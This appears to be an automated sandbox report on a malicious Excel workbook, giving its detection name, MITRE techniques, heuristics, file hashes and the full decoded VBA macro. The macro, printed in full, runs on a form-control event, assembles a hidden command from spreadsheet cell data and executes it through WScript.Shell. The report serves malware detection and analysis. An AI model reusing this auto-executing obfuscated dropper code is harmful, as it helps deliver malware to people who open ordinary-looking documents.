MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an Excel document containing VBA macros that leverage WScript.Shell to execute a command. The script attempts to construct a command string by concatenating characters derived from cell values, which is then executed. This behavior is indicative of a dropper that downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Xls.Dropper.Agent-8810704-0'. The use of WScript.Shell and the execution of an arbitrary command are key indicators.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-8810704-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-8810704-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0 ActiveWorkbook.Close False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0 ActiveWorkbook.Close False
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1058 bytes |
SHA-256: 4d85480660effb9e19d036c20741c00162241852d175c48484056d348568aafa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "A, 1, 0, MSForms, Frame"
Private Sub A_Layout()
Dim c(2398)
For Each Ee In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
c(Ee.value) = Chr(Ee.Row)
Next
For Each k In c
fig = fig + k
Next
On Error Resume Next
Print Err.Number & " " & Wscript.echo.Quit:: CreateObject("Wscript.Shell").exec(fig).ExitCode , vbCritical, "", 0
ActiveWorkbook.Close False
End Sub
Sub lets()
MsgBox "": h = 12
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes |
SHA-256: e3e17661a75445ffd10c6364258e1bbcd96fac6ebdc46c5199b7ca1c0cc54a82 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-8810704-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes |
SHA-256: 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.